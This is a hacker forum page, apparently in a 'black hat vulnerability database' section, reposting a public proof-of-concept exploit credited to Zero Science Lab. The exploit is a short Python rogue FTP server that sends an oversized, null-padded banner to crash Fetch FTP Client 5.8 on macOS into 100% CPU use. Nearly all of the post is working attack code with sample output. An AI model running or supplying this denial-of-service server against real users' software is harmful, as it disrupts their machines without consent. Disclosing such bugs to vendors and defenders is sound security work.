跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
# Exploit Author: liquidworm

#!/usr/bin/env python
#
#
# Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)
#
#
# Vendor: Fetch Softworks
# Product web page: https://www.fetchsoftworks.com
# Affected version: 5.8.2 (5K1354)
#
# Summary: Fetch is a reliable, full-featured file transfer client for the
# Apple Macintosh whose user interface emphasizes simplicity and ease of use.
# Fetch supports FTP and SFTP, the most popular file transfer protocols on
# the Internet for compatibility with thousands of Internet service providers,
# web hosting companies, publishers, pre-press companies, and more.
#
# Desc: The application is prone to a DoS after receiving a long server response
# (more than 2K bytes) leading to 100% CPU consumption.
#
# --------------------------------------------------------------------------------
# ~/Desktop> ps ucp 3498
# USER     PID  %CPU %MEM      VSZ    RSS   TT  STAT STARTED      TIME COMMAND
# lqwrm   3498 100.0  0.5 60081236  54488   ??  R     5:44PM   4:28.97 Fetch-5K1354-266470421
# ~/Desktop> 
# --------------------------------------------------------------------------------
#
# Tested on: macOS Monterey 12.2
#            macOS Big Sur 11.6.2
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5696
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php
#
#
# 27.01.2022
#

import socket

host = '0.0.0.0'
port = 21

s = socket.socket()
s.bind((host, port))
s.listen(2)

print('Ascolto su', host, 'porta', port, '...')

consumptor  = '220\x20'
consumptor += 'ftp.zeroscience.mk'
consumptor += '\x00' * 0x101E
consumptor += '\x0D\x0A'

while True:
    try:
        c, a = s.accept()
        print('Connessione da', a)
        print('CPU 100%, Memory++')
        c.send(bytes(consumptor, 'UTF-8'))
        c.send(b'Thricer OK, p\'taah\x0A\x0D')
        print(c.recv(17))
    except:
        break

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。